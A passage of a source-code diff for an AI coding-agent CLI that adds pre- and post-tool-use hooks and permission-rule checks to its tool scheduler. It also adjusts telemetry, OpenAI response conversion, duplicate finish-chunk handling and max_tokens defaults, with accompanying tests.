firePreToolUseHook( + messageBus, + toolName, + toolInput, + toolUseId, + permissionMode, + ); + + if (!preHookResult.shouldProceed) { + // Hook blocked the execution + const blockMessage = + preHookResult.blockReason || 'Tool execution blocked by hook'; + const errorResponse = createErrorResponse( + scheduledCall.request, + new Error(blockMessage), + ToolErrorType.EXECUTION_DENIED, + ); + this.setStatusInternal(callId, 'error', errorResponse); + return; + } + } + this.setStatusInternal(callId, 'executing'); const liveOutputCallback = scheduledCall.tool.canUpdateOutput @@ -1204,51 +1458,75 @@ export class CoreToolScheduler { try { const toolResult: ToolResult = await promise; if (signal.aborted) { - this.setStatusInternal( - callId, - 'cancelled', - 'User cancelled tool execution.', - ); - return; + // PostToolUseFailure Hook + if (hooksEnabled && messageBus) { + const failureHookResult = await firePostToolUseFailureHook( + messageBus, + toolUseId, + toolName, + toolInput, + 'User cancelled tool execution.', + true, + this.config.getApprovalMode(), + ); + + // Append additional context from hook if provided + let cancelMessage = 'User cancelled tool execution.'; + if (failureHookResult.additionalContext) { + cancelMessage += `\n\n${failureHookResult.additionalContext}`; + } + this.setStatusInternal(callId, 'cancelled', cancelMessage); + } else { + this.setStatusInternal( + callId, + 'cancelled', + 'User cancelled tool execution.', + ); + } + return; // Both code paths should return here } if (toolResult.error === undefined) { let content = toolResult.llmContent; - let outputFile: string | undefined = undefined; const contentLength = typeof content === 'string' ? 
content.length : undefined; - if ( - typeof content === 'string' && - toolName === ShellTool.Name && - this.config.getEnableToolOutputTruncation() && - this.config.getTruncateToolOutputThreshold() > 0 && - this.config.getTruncateToolOutputLines() > 0 - ) { - const originalContentLength = content.length; - const threshold = this.config.getTruncateToolOutputThreshold(); - const lines = this.config.getTruncateToolOutputLines(); - const truncatedResult = await truncateAndSaveToFile( - content, - callId, - this.config.storage.getProjectTempDir(), - threshold, - lines, - ); - content = truncatedResult.content; - outputFile = truncatedResult.outputFile; - if (outputFile) { - logToolOutputTruncated( - this.config, - new ToolOutputTruncatedEvent(scheduledCall.request.prompt_id, { - toolName, - originalContentLength, - truncatedContentLength: content.length, - threshold, - lines, - }), + // PostToolUse Hook + if (hooksEnabled && messageBus) { + const toolResponse = { + llmContent: content, + returnDisplay: toolResult.returnDisplay, + }; + const permissionMode = this.config.getApprovalMode(); + const postHookResult = await firePostToolUseHook( + messageBus, + toolName, + toolInput, + toolResponse, + toolUseId, + permissionMode, + ); + + // Append additional context from hook if provided + if (postHookResult.additionalContext) { + content = appendAdditionalContext( + content, + postHookResult.additionalContext, ); } + + // Check if hook requested to stop execution + if (postHookResult.shouldStop) { + const stopMessage = + postHookResult.stopReason || 'Execution stopped by hook'; + const errorResponse = createErrorResponse( + scheduledCall.request, + new Error(stopMessage), + ToolErrorType.EXECUTION_DENIED, + ); + this.setStatusInternal(callId, 'error', errorResponse); + return; + } } const response = convertToFunctionResponse(toolName, callId, content); @@ -1258,13 +1536,31 @@ export class CoreToolScheduler { resultDisplay: toolResult.returnDisplay, error: undefined, 
errorType: undefined, - outputFile, contentLength, }; this.setStatusInternal(callId, 'success', successResponse); } else { // It is a failure - const error = new Error(toolResult.error.message); + // PostToolUseFailure Hook + let errorMessage = toolResult.error.message; + if (hooksEnabled && messageBus) { + const failureHookResult = await firePostToolUseFailureHook( + messageBus, + toolUseId, + toolName, + toolInput, + toolResult.error.message, + false, + this.config.getApprovalMode(), + ); + + // Append additional context from hook if provided + if (failureHookResult.additionalContext) { + errorMessage += `\n\n${failureHookResult.additionalContext}`; + } + } + + const error = new Error(errorMessage); const errorResponse = createErrorResponse( scheduledCall.request, error, @@ -1273,20 +1569,64 @@ export class CoreToolScheduler { this.setStatusInternal(callId, 'error', errorResponse); } } catch (executionError: unknown) { + const errorMessage = + executionError instanceof Error + ? executionError.message + : String(executionError); + if (signal.aborted) { - this.setStatusInternal( - callId, - 'cancelled', - 'User cancelled tool execution.', - ); + // PostToolUseFailure Hook (user interrupt) + if (hooksEnabled && messageBus) { + const failureHookResult = await firePostToolUseFailureHook( + messageBus, + toolUseId, + toolName, + toolInput, + 'User cancelled tool execution.', + true, + this.config.getApprovalMode(), + ); + + // Append additional context from hook if provided + let cancelMessage = 'User cancelled tool execution.'; + if (failureHookResult.additionalContext) { + cancelMessage += `\n\n${failureHookResult.additionalContext}`; + } + this.setStatusInternal(callId, 'cancelled', cancelMessage); + } else { + this.setStatusInternal( + callId, + 'cancelled', + 'User cancelled tool execution.', + ); + } + return; } else { + // PostToolUseFailure Hook + let exceptionErrorMessage = errorMessage; + if (hooksEnabled && messageBus) { + const failureHookResult = await 
firePostToolUseFailureHook( + messageBus, + toolUseId, + toolName, + toolInput, + errorMessage, + false, + this.config.getApprovalMode(), + ); + + // Append additional context from hook if provided + if (failureHookResult.additionalContext) { + exceptionErrorMessage += `\n\n${failureHookResult.additionalContext}`; + } + } this.setStatusInternal( callId, 'error', createErrorResponse( scheduledCall.request, executionError instanceof Error - ? executionError + ? new Error(exceptionErrorMessage) : new Error(String(executionError)), ToolErrorType.UNHANDLED_EXCEPTION, ), @@ -1385,10 +1725,57 @@ export class CoreToolScheduler { for (const pendingTool of pendingTools) { try { - const stillNeedsConfirmation = - await pendingTool.invocation.shouldConfirmExecute(signal); + // Re-run L3→L4 to see if the tool can now be auto-approved + const defaultPermission = + await pendingTool.invocation.getDefaultPermission(); + let finalPermission = defaultPermission; - if (!stillNeedsConfirmation) { + // L4: PM override + const pm = this.config.getPermissionManager?.(); + if (pm && defaultPermission !== 'deny') { + const params = pendingTool.invocation.params as Record< + string, + unknown + >; + const shellCommand = + 'command' in params ? String(params['command']) : undefined; + const filePath = + typeof params['absolute_path'] === 'string' + ? params['absolute_path'] + : typeof params['file_path'] === 'string' + ? params['file_path'] + : undefined; + let domain: string | undefined; + if (typeof params['url'] === 'string') { + try { + domain = new URL(params['url']).hostname; + } catch { + // malformed URL + } + } + // Generic specifier for literal matching (Skill name, Task subagent type, etc.) + const literalSpecifier = + typeof params['skill'] === 'string' + ? params['skill'] + : typeof params['subagent_type'] === 'string' + ? 
params['subagent_type'] + : undefined; + const pmCtx = { + toolName: pendingTool.request.name, + command: shellCommand, + filePath, + domain, + specifier: literalSpecifier, + }; + if (pm.hasRelevantRules(pmCtx)) { + const pmDecision = pm.evaluate(pmCtx); + if (pmDecision !== 'default') { + finalPermission = pmDecision; + } + } + } + + if (finalPermission === 'allow') { this.setToolCallOutcome( pendingTool.request.callId, ToolConfirmationOutcome.ProceedAlways, diff --git a/packages/core/src/core/geminiChat.test.ts b/packages/core/src/core/geminiChat.test.ts index 4f69b62eb..2f9e2d107 100644 --- a/packages/core/src/core/geminiChat.test.ts +++ b/packages/core/src/core/geminiChat.test.ts @@ -124,7 +124,13 @@ describe('GeminiChat', async () => { // Disable 429 simulation for tests setSimulate429(false); // Reset history for each test by creating a new instance - chat = new GeminiChat(mockConfig, config, []); + chat = new GeminiChat( + mockConfig, + config, + [], + undefined, + uiTelemetryService, + ); }); afterEach(() => { @@ -1718,4 +1724,73 @@ describe('GeminiChat', async () => { ]); }); }); + + describe('stripOrphanedUserEntriesFromHistory', () => { + it('should pop a single trailing user entry', () => { + chat.setHistory([ + { role: 'user', parts: [{ text: 'first message' }] }, + { role: 'model', parts: [{ text: 'first response' }] }, + { role: 'user', parts: [{ text: 'orphaned message' }] }, + ]); + + chat.stripOrphanedUserEntriesFromHistory(); + + expect(chat.getHistory()).toEqual([ + { role: 'user', parts: [{ text: 'first message' }] }, + { role: 'model', parts: [{ text: 'first response' }] }, + ]); + }); + + it('should pop multiple trailing user entries', () => { + chat.setHistory([ + { role: 'user', parts: [{ text: 'query' }] }, + { + role: 'model', + parts: [{ functionCall: { name: 'tool', args: {} } }], + }, + { role: 'user', parts: [{ text: 'IDE context' }] }, + { + role: 'user', + parts: [ + { + functionResponse: { + name: 'tool', + response: { result: 'ok' 
}, + }, + }, + ], + }, + ]); + + chat.stripOrphanedUserEntriesFromHistory(); + + expect(chat.getHistory()).toEqual([ + { role: 'user', parts: [{ text: 'query' }] }, + { + role: 'model', + parts: [{ functionCall: { name: 'tool', args: {} } }], + }, + ]); + }); + + it('should be a no-op when last entry is a model response', () => { + const history = [ + { role: 'user', parts: [{ text: 'hello' }] }, + { role: 'model', parts: [{ text: 'hi' }] }, + ]; + chat.setHistory([...history]); + + chat.stripOrphanedUserEntriesFromHistory(); + + expect(chat.getHistory()).toEqual(history); + }); + + it('should handle empty history', () => { + chat.setHistory([]); + + chat.stripOrphanedUserEntriesFromHistory(); + + expect(chat.getHistory()).toEqual([]); + }); + }); }); diff --git a/packages/core/src/core/geminiChat.ts b/packages/core/src/core/geminiChat.ts index f58bcdb61..db2d0b803 100644 --- a/packages/core/src/core/geminiChat.ts +++ b/packages/core/src/core/geminiChat.ts @@ -17,7 +17,8 @@ import type { GenerateContentResponseUsageMetadata, } from '@google/genai'; import { createUserContent } from '@google/genai'; -import { getErrorStatus, retryWithBackoff } from '../utils/retry.js'; +import { retryWithBackoff } from '../utils/retry.js'; +import { getErrorStatus } from '../utils/errors.js'; import { createDebugLogger } from '../utils/debugLogger.js'; import { parseAndFormatApiError } from '../utils/errorParsing.js'; import { isRateLimitError, type RetryInfo } from '../utils/rateLimit.js'; @@ -33,6 +34,7 @@ import { ContentRetryEvent, ContentRetryFailureEvent, } from '../telemetry/types.js'; +import type { UiTelemetryService } from '../telemetry/uiTelemetry.js'; import { uiTelemetryService } from '../telemetry/uiTelemetry.js'; const debugLogger = createDebugLogger('QWEN_CODE_CHAT'); @@ -234,12 +236,16 @@ export class GeminiChat { * @param history - Optional initial conversation history. * @param chatRecordingService - Optional recording service. 
If provided, chat * messages will be recorded. + * @param telemetryService - Optional UI telemetry service. When provided, + * prompt token counts are reported on each API response. Pass `undefined` + * for sub-agent chats to avoid overwriting the main agent's context usage. */ constructor( private readonly config: Config, private readonly generationConfig: GenerateContentConfig = {}, private history: Content[] = [], private readonly chatRecordingService?: ChatRecordingService, + private readonly telemetryService?: UiTelemetryService, ) { validateHistory(history); } @@ -571,6 +577,20 @@ export class GeminiChat { .filter((content) => content.parts && content.parts.length > 0); } + /** + * Pop all orphaned trailing user entries from chat history. + * In a valid conversation the last entry is always a model response; + * any trailing user entries are leftovers from a request that failed. + */ + stripOrphanedUserEntriesFromHistory(): void { + while ( + this.history.length > 0 && + this.history[this.history.length - 1]!.role === 'user' + ) { + this.history.pop(); + } + } + setTools(tools: Tool[]): void { this.generationConfig.tools = tools; } @@ -635,10 +655,21 @@ export class GeminiChat { // Collect token usage for consolidated recording if (chunk.usageMetadata) { usageMetadata = chunk.usageMetadata; + // Use || instead of ?? so that totalTokenCount=0 falls back to promptTokenCount. + // Some providers omit total_tokens or return 0 in streaming usage chunks. const lastPromptTokenCount = - usageMetadata.totalTokenCount ?? usageMetadata.promptTokenCount; + usageMetadata.totalTokenCount || usageMetadata.promptTokenCount; if (lastPromptTokenCount) { - uiTelemetryService.setLastPromptTokenCount(lastPromptTokenCount); + (this.telemetryService ?? uiTelemetryService).setLastPromptTokenCount( + lastPromptTokenCount, + ); + } + if (usageMetadata.cachedContentTokenCount) { + ( + this.telemetryService ?? 
uiTelemetryService + ).setLastCachedContentTokenCount( + usageMetadata.cachedContentTokenCount, + ); } } @@ -690,6 +721,8 @@ export class GeminiChat { // Record assistant turn with raw Content and metadata if (thoughtContentPart || contentText || hasToolCall || usageMetadata) { + const contextWindowSize = + this.config.getContentGeneratorConfig()?.contextWindowSize; this.chatRecordingService?.recordAssistantTurn({ model, message: [ @@ -702,6 +735,7 @@ export class GeminiChat { : []), ], tokens: usageMetadata, + contextWindowSize, }); } diff --git a/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.test.ts b/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.test.ts index 156b75a01..06be16ea5 100644 --- a/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.test.ts +++ b/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.test.ts @@ -35,6 +35,8 @@ vi.mock('../../utils/openaiLogger.js', () => ({ })), })); +const realConvertGeminiRequestToOpenAI = + OpenAIContentConverter.prototype.convertGeminiRequestToOpenAI; const convertGeminiRequestToOpenAISpy = vi .spyOn(OpenAIContentConverter.prototype, 'convertGeminiRequestToOpenAI') .mockReturnValue([{ role: 'user', content: 'converted' }]); @@ -50,6 +52,10 @@ const convertGeminiResponseToOpenAISpy = vi model: 'test-model', choices: [], } as OpenAI.Chat.ChatCompletion); +const setModalitiesSpy = vi.spyOn( + OpenAIContentConverter.prototype, + 'setModalities', +); const createConfig = (overrides: Record = {}): Config => { const configContent = { @@ -109,6 +115,7 @@ describe('LoggingContentGenerator', () => { convertGeminiRequestToOpenAISpy.mockClear(); convertGeminiToolsToOpenAISpy.mockClear(); convertGeminiResponseToOpenAISpy.mockClear(); + setModalitiesSpy.mockClear(); }); it('logs request/response, normalizes thought parts, and logs OpenAI interaction', async () => { @@ -225,7 +232,7 @@ describe('LoggingContentGenerator', () => { it('logs errors 
with status code and request id, then rethrows', async () => { const error = Object.assign(new Error('boom'), { - code: 429, + status: 429, request_id: 'req-99', type: 'rate_limit', }); @@ -394,4 +401,76 @@ describe('LoggingContentGenerator', () => { ?.value as { logInteraction: ReturnType }; expect(openaiLoggerInstance.logInteraction).toHaveBeenCalledTimes(1); }); + + it('uses generator modalities when converting logged OpenAI requests', async () => { + convertGeminiRequestToOpenAISpy.mockImplementationOnce(function ( + this: OpenAIContentConverter, + request, + options, + ) { + return realConvertGeminiRequestToOpenAI.call(this, request, options); + }); + + const wrapped = createWrappedGenerator( + vi + .fn() + .mockResolvedValue( + createResponse('resp-5', 'test-model', [{ text: 'ok' }]), + ), + vi.fn(), + ); + const generatorConfig = { + model: 'test-model', + authType: AuthType.USE_OPENAI, + enableOpenAILogging: true, + modalities: { image: true }, + }; + const generator = new LoggingContentGenerator( + wrapped, + createConfig(), + generatorConfig, + ); + + const request = { + model: 'test-model', + contents: [ + { + role: 'user', + parts: [ + { text: 'Inspect this' }, + { + inlineData: { + mimeType: 'image/png', + data: 'img-data', + displayName: 'diagram.png', + }, + }, + ], + }, + ], + } as unknown as GenerateContentParameters; + + await generator.generateContent(request, 'prompt-5'); + + expect(setModalitiesSpy).toHaveBeenCalledWith({ image: true }); + + const openaiLoggerInstance = vi.mocked(OpenAILogger).mock.results[0] + ?.value as { logInteraction: ReturnType }; + const [openaiRequest] = openaiLoggerInstance.logInteraction.mock + .calls[0] as [OpenAI.Chat.ChatCompletionCreateParams]; + expect(openaiRequest.messages).toEqual([ + { + role: 'user', + content: [ + { type: 'text', text: 'Inspect this' }, + { + type: 'image_url', + image_url: { + url: 'data:image/png;base64,img-data', + }, + }, + ], + }, + ]); + }); }); diff --git 
a/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.ts b/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.ts index 1a51846c3..61fc885e9 100644 --- a/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.ts +++ b/packages/core/src/core/loggingContentGenerator/loggingContentGenerator.ts @@ -34,14 +34,15 @@ import { import type { ContentGenerator, ContentGeneratorConfig, + InputModalities, } from '../contentGenerator.js'; -import { isStructuredError } from '../../utils/quotaErrorDetection.js'; import { OpenAIContentConverter } from '../openaiContentGenerator/converter.js'; import { OpenAILogger } from '../../utils/openaiLogger.js'; - -interface StructuredError { - status: number; -} +import { + getErrorMessage, + getErrorStatus, + getErrorType, +} from '../../utils/errors.js'; /** * A decorator that wraps a ContentGenerator to add logging to API calls. @@ -49,12 +50,15 @@ interface StructuredError { export class LoggingContentGenerator implements ContentGenerator { private openaiLogger?: OpenAILogger; private schemaCompliance?: 'auto' | 'openapi_30'; + private modalities?: InputModalities; constructor( private readonly wrapped: ContentGenerator, private readonly config: Config, generatorConfig: ContentGeneratorConfig, ) { + this.modalities = generatorConfig.modalities; + // Extract fields needed for initialization from passed config // (config.getContentGeneratorConfig() may not be available yet during refreshAuth) if (generatorConfig.enableOpenAILogging) { @@ -108,33 +112,26 @@ export class LoggingContentGenerator implements ContentGenerator { model: string, prompt_id: string, ): void { - const errorMessage = error instanceof Error ? error.message : String(error); - const errorType = - (error as { type?: string })?.type || - (error instanceof Error ? 
error.name : 'unknown'); + const errorMessage = getErrorMessage(error); + const errorType = getErrorType(error); const errorResponseId = (error as { requestID?: string; request_id?: string })?.requestID || (error as { requestID?: string; request_id?: string })?.request_id || responseId; - const errorStatus = - (error as { code?: string | number; status?: number })?.code ?? - (error as { status?: number })?.status ?? - (isStructuredError(error) - ? (error as StructuredError).status - : undefined); + const errorStatus = getErrorStatus(error); logApiError( this.config, - new ApiErrorEvent( - errorResponseId, + new ApiErrorEvent({ + responseId: errorResponseId, model, - errorMessage, durationMs, - prompt_id, - this.config.getAuthType(), + promptId: prompt_id, + authType: this.config.getAuthType(), + errorMessage, errorType, - errorStatus, - ), + statusCode: errorStatus, + }), ); } @@ -247,6 +244,7 @@ export class LoggingContentGenerator implements ContentGenerator { request.model, this.schemaCompliance, ); + converter.setModalities(this.modalities ?? 
{}); const messages = converter.convertGeminiRequestToOpenAI(request, { cleanOrphanToolCalls: false, }); diff --git a/packages/core/src/core/nonInteractiveToolExecutor.test.ts b/packages/core/src/core/nonInteractiveToolExecutor.test.ts index 989b61c37..866370837 100644 --- a/packages/core/src/core/nonInteractiveToolExecutor.test.ts +++ b/packages/core/src/core/nonInteractiveToolExecutor.test.ts @@ -62,6 +62,16 @@ describe('executeToolCall', () => { getUseModelRouter: () => false, getGeminiClient: () => null, // No client needed for these tests getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), + getHookSystem: vi.fn().mockReturnValue(undefined), + getDebugLogger: vi.fn().mockReturnValue({ + debug: vi.fn(), + info: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + }), + isInteractive: vi.fn().mockReturnValue(false), } as unknown as Config; abortController = new AbortController(); @@ -94,7 +104,6 @@ describe('executeToolCall', () => { callId: 'call1', error: undefined, errorType: undefined, - outputFile: undefined, resultDisplay: 'Success!', contentLength: typeof toolResult.llmContent === 'string' @@ -299,7 +308,6 @@ describe('executeToolCall', () => { callId: 'call6', error: undefined, errorType: undefined, - outputFile: undefined, resultDisplay: 'Image processed', contentLength: undefined, responseParts: [ diff --git a/packages/core/src/core/openaiContentGenerator/converter.test.ts b/packages/core/src/core/openaiContentGenerator/converter.test.ts index 115d6dc0d..46e84e672 100644 --- a/packages/core/src/core/openaiContentGenerator/converter.test.ts +++ b/packages/core/src/core/openaiContentGenerator/converter.test.ts @@ -1014,6 +1014,20 @@ describe('OpenAIContentConverter', () => { }); }); + describe('convertOpenAIResponseToGemini', () => { + it('should handle empty choices array without crashing', () => { + const response = converter.convertOpenAIResponseToGemini({ + object: 
'chat.completion', + id: 'chatcmpl-empty', + created: 123, + model: 'test-model', + choices: [], + } as unknown as OpenAI.Chat.ChatCompletion); + + expect(response.candidates).toEqual([]); + }); + }); + describe('OpenAI -> Gemini reasoning content', () => { it('should convert reasoning_content to a thought part for non-streaming responses', () => { const response = converter.convertOpenAIResponseToGemini({ diff --git a/packages/core/src/core/openaiContentGenerator/converter.ts b/packages/core/src/core/openaiContentGenerator/converter.ts index d90737d10..91d0b31fb 100644 --- a/packages/core/src/core/openaiContentGenerator/converter.ts +++ b/packages/core/src/core/openaiContentGenerator/converter.ts @@ -821,42 +821,60 @@ export class OpenAIContentConverter { convertOpenAIResponseToGemini( openaiResponse: OpenAI.Chat.ChatCompletion, ): GenerateContentResponse { - const choice = openaiResponse.choices[0]; + const choice = openaiResponse.choices?.[0]; const response = new GenerateContentResponse(); - const parts: Part[] = []; + if (choice) { + const parts: Part[] = []; - // Handle reasoning content (thoughts) - const reasoningText = - (choice.message as ExtendedCompletionMessage).reasoning_content ?? - (choice.message as ExtendedCompletionMessage).reasoning; - if (reasoningText) { - parts.push({ text: reasoningText, thought: true }); - } + // Handle reasoning content (thoughts) + const reasoningText = + (choice.message as ExtendedCompletionMessage).reasoning_content ?? 
+ (choice.message as ExtendedCompletionMessage).reasoning; + if (reasoningText) { + parts.push({ text: reasoningText, thought: true }); + } - // Handle text content - if (choice.message.content) { - parts.push({ text: choice.message.content }); - } + // Handle text content + if (choice.message.content) { + parts.push({ text: choice.message.content }); + } - // Handle tool calls - if (choice.message.tool_calls) { - for (const toolCall of choice.message.tool_calls) { - if (toolCall.function) { - let args: Record = {}; - if (toolCall.function.arguments) { - args = safeJsonParse(toolCall.function.arguments, {}); + // Handle tool calls + if (choice.message.tool_calls) { + for (const toolCall of choice.message.tool_calls) { + if (toolCall.function) { + let args: Record = {}; + if (toolCall.function.arguments) { + args = safeJsonParse(toolCall.function.arguments, {}); + } + + parts.push({ + functionCall: { + id: toolCall.id, + name: toolCall.function.name, + args, + }, + }); } - - parts.push({ - functionCall: { - id: toolCall.id, - name: toolCall.function.name, - args, - }, - }); } } + + response.candidates = [ + { + content: { + parts, + role: 'model' as const, + }, + finishReason: this.mapOpenAIFinishReasonToGemini( + choice.finish_reason || 'stop', + ), + index: 0, + safetyRatings: [], + }, + ]; + } else { + response.candidates = []; } response.responseId = openaiResponse.id; @@ -864,20 +882,6 @@ export class OpenAIContentConverter { ? 
openaiResponse.created.toString() : new Date().getTime().toString(); - response.candidates = [ - { - content: { - parts, - role: 'model' as const, - }, - finishReason: this.mapOpenAIFinishReasonToGemini( - choice.finish_reason || 'stop', - ), - index: 0, - safetyRatings: [], - }, - ]; - response.modelVersion = this.model; response.promptFeedback = { safetyRatings: [] }; diff --git a/packages/core/src/core/openaiContentGenerator/pipeline.ts b/packages/core/src/core/openaiContentGenerator/pipeline.ts index 5c6cdc682..4e2d42bd8 100644 --- a/packages/core/src/core/openaiContentGenerator/pipeline.ts +++ b/packages/core/src/core/openaiContentGenerator/pipeline.ts @@ -255,9 +255,23 @@ export class ContentGenerationPipeline { .candidates?.[0]?.finishReason; if (isFinishChunk) { - // This is a finish reason chunk - collectedGeminiResponses.push(response); - setPendingFinish(response); + if (hasPendingFinish) { + // Duplicate finish chunk (e.g. from OpenRouter providers that send two + // finish_reason chunks for tool calls). The streaming tool call parser + // was already reset after the first finish chunk, so the second one + // carries no functionCall parts. Merge only usageMetadata and keep the + // candidates (including functionCall parts) from the first finish chunk. 
+ const lastResponse = + collectedGeminiResponses[collectedGeminiResponses.length - 1]; + if (response.usageMetadata) { + lastResponse.usageMetadata = response.usageMetadata; + } + setPendingFinish(lastResponse); + } else { + // This is a finish reason chunk + collectedGeminiResponses.push(response); + setPendingFinish(response); + } return false; // Don't yield yet, wait for potential subsequent chunks to merge } else if (hasPendingFinish) { // We have a pending finish chunk, merge this chunk's data into it diff --git a/packages/core/src/core/openaiContentGenerator/provider/dashscope.test.ts b/packages/core/src/core/openaiContentGenerator/provider/dashscope.test.ts index e1ecb61b6..c64ee436d 100644 --- a/packages/core/src/core/openaiContentGenerator/provider/dashscope.test.ts +++ b/packages/core/src/core/openaiContentGenerator/provider/dashscope.test.ts @@ -789,7 +789,7 @@ describe('DashScopeOpenAICompatibleProvider', () => { expect(result.max_tokens).toBe(1000); // Should remain unchanged }); - it('should not add max_tokens when not present in request', () => { + it('should set conservative max_tokens default when not present in request', () => { const request: OpenAI.Chat.ChatCompletionCreateParams = { model: 'qwen3-max', messages: [{ role: 'user', content: 'Hello' }], @@ -798,31 +798,35 @@ describe('DashScopeOpenAICompatibleProvider', () => { const result = provider.buildRequest(request, 'test-prompt-id'); - expect(result.max_tokens).toBeUndefined(); // Should remain undefined + // Should set conservative default (min of model limit and DEFAULT_OUTPUT_TOKEN_LIMIT) + // qwen3-max has 64K output limit, so min(64K, 32K) = 32K + expect(result.max_tokens).toBe(32000); }); - it('should handle null max_tokens parameter', () => { + it('should set conservative max_tokens when null is provided', () => { const request: OpenAI.Chat.ChatCompletionCreateParams = { model: 'qwen3-max', messages: [{ role: 'user', content: 'Hello' }], - max_tokens: null, + max_tokens: null as 
unknown as undefined, }; const result = provider.buildRequest(request, 'test-prompt-id'); - expect(result.max_tokens).toBeNull(); // Should remain null + // null is treated as not configured, so set conservative default + expect(result.max_tokens).toBe(32000); }); - it('should use default output limit for unknown models', () => { + it('should respect user max_tokens for unknown models', () => { const request: OpenAI.Chat.ChatCompletionCreateParams = { model: 'unknown-model', messages: [{ role: 'user', content: 'Hello' }], - max_tokens: 10000, // Exceeds the default limit + max_tokens: 40000, // User explicitly sets 40K }; const result = provider.buildRequest(request, 'test-prompt-id'); - expect(result.max_tokens).toBe(8192); // Should be limited to default output limit (8K) + // Unknown models: respect user's configuration (backend may support it) + expect(result.max_tokens).toBe(40000); }); it('should preserve other request parameters when limiting max_tokens', () => { diff --git a/packages/core/src/core/openaiContentGenerator/provider/dashscope.ts b/packages/core/src/core/openaiContentGenerator/provider/dashscope.ts index a889401cf..a94ad0be3 100644 --- a/packages/core/src/core/openaiContentGenerator/provider/dashscope.ts +++ b/packages/core/src/core/openaiContentGenerator/provider/dashscope.ts @@ -9,27 +9,20 @@ import { DEFAULT_DASHSCOPE_BASE_URL, } from '../constants.js'; import type { - OpenAICompatibleProvider, DashScopeRequestMetadata, ChatCompletionContentPartTextWithCache, ChatCompletionContentPartWithCache, ChatCompletionToolWithCache, } from './types.js'; import { buildRuntimeFetchOptions } from '../../../utils/runtimeFetchOptions.js'; -import { tokenLimit } from '../../tokenLimits.js'; - -export class DashScopeOpenAICompatibleProvider - implements OpenAICompatibleProvider -{ - private contentGeneratorConfig: ContentGeneratorConfig; - private cliConfig: Config; +import { DefaultOpenAICompatibleProvider } from './default.js'; +export class 
DashScopeOpenAICompatibleProvider extends DefaultOpenAICompatibleProvider { constructor( contentGeneratorConfig: ContentGeneratorConfig, cliConfig: Config, ) { - this.cliConfig = cliConfig; - this.contentGeneratorConfig = contentGeneratorConfig; + super(contentGeneratorConfig, cliConfig); } static isDashScopeProvider( @@ -44,7 +37,7 @@ export class DashScopeOpenAICompatibleProvider return /([\w-]+\.)?dashscope(-intl)?\.aliyuncs\.com/i.test(baseUrl); } - buildHeaders(): Record { + override buildHeaders(): Record { const version = this.cliConfig.getCliVersion() || 'unknown'; const userAgent = `QwenCode/${version} (${process.platform}; ${process.arch})`; const { authType, customHeaders } = this.contentGeneratorConfig; @@ -60,7 +53,7 @@ export class DashScopeOpenAICompatibleProvider : defaultHeaders; } - buildClient(): OpenAI { + override buildClient(): OpenAI { const { apiKey, baseUrl = DEFAULT_DASHSCOPE_BASE_URL, @@ -98,7 +91,7 @@ export class DashScopeOpenAICompatibleProvider * @param userPromptId - Unique identifier for the user prompt for session tracking * @returns Configured request with DashScope-specific parameters applied */ - buildRequest( + override buildRequest( request: OpenAI.Chat.ChatCompletionCreateParams, userPromptId: string, ): OpenAI.Chat.ChatCompletionCreateParams { @@ -116,8 +109,9 @@ export class DashScopeOpenAICompatibleProvider tools = updatedTools; } - // Apply output token limits based on model capabilities - // This ensures max_tokens doesn't exceed the model's maximum output limit + // Apply output token limits using parent class logic + // Uses conservative default (min of model limit and DEFAULT_OUTPUT_TOKEN_LIMIT) + // to preserve input quota when user hasn't explicitly configured max_tokens const requestWithTokenLimits = this.applyOutputTokenLimit(request); const extraBody = this.contentGeneratorConfig.extra_body; @@ -155,7 +149,7 @@ export class DashScopeOpenAICompatibleProvider }; } - getDefaultGenerationConfig(): 
GenerateContentConfig { + override getDefaultGenerationConfig(): GenerateContentConfig { return { temperature: 0.3, }; @@ -316,41 +310,6 @@ export class DashScopeOpenAICompatibleProvider return false; } - /** - * Apply output token limit to a request's max_tokens parameter. - * - * Ensures that existing max_tokens parameters don't exceed the model's maximum output - * token limit. Only modifies max_tokens when already present in the request. - * - * @param request - The chat completion request parameters - * @returns The request with max_tokens adjusted to respect the model's limits (if present) - */ - private applyOutputTokenLimit< - T extends { max_tokens?: number | null; model: string }, - >(request: T): T { - const currentMaxTokens = request.max_tokens; - - // Only process if max_tokens is already present in the request - if (currentMaxTokens === undefined || currentMaxTokens === null) { - return request; // No max_tokens parameter, return unchanged - } - - // Dynamically calculate output token limit using tokenLimit function - // This ensures we always use the latest model-specific limits without relying on user configuration - const modelLimit = tokenLimit(request.model, 'output'); - - // If max_tokens exceeds the model limit, cap it to the model's limit - if (currentMaxTokens > modelLimit) { - return { - ...request, - max_tokens: modelLimit, - }; - } - - // If max_tokens is within the limit, return the request unchanged - return request; - } - /** * Check if cache control should be disabled based on configuration. 
* diff --git a/packages/core/src/core/openaiContentGenerator/provider/default.test.ts b/packages/core/src/core/openaiContentGenerator/provider/default.test.ts index cc227b464..ce46a3621 100644 --- a/packages/core/src/core/openaiContentGenerator/provider/default.test.ts +++ b/packages/core/src/core/openaiContentGenerator/provider/default.test.ts @@ -193,6 +193,76 @@ describe('DefaultOpenAICompatibleProvider', () => { expect(result).not.toBe(originalRequest); // Should be a new object }); + it('should set conservative max_tokens default when not configured', () => { + const requestWithoutMaxTokens: OpenAI.Chat.ChatCompletionCreateParams = { + model: 'gpt-4', + messages: [{ role: 'user', content: 'Hello' }], + }; + + const result = provider.buildRequest( + requestWithoutMaxTokens, + 'prompt-id', + ); + + // Should set conservative default (min of model limit and DEFAULT_OUTPUT_TOKEN_LIMIT) + // GPT-4 has 16K output limit, so min(16K, 32K) = 16K + expect(result.max_tokens).toBe(16384); + }); + + it('should respect user max_tokens for unknown models (deployment aliases, self-hosted)', () => { + // Unknown models: user config is respected entirely (backend may support larger limits) + const request: OpenAI.Chat.ChatCompletionCreateParams = { + model: 'unknown-model', + messages: [{ role: 'user', content: 'Hello' }], + max_tokens: 100000, + }; + + const result = provider.buildRequest(request, 'prompt-id'); + + // User's 100K setting is preserved for unknown models + expect(result.max_tokens).toBe(100000); + }); + + it('should use conservative default for unknown models when max_tokens not configured', () => { + 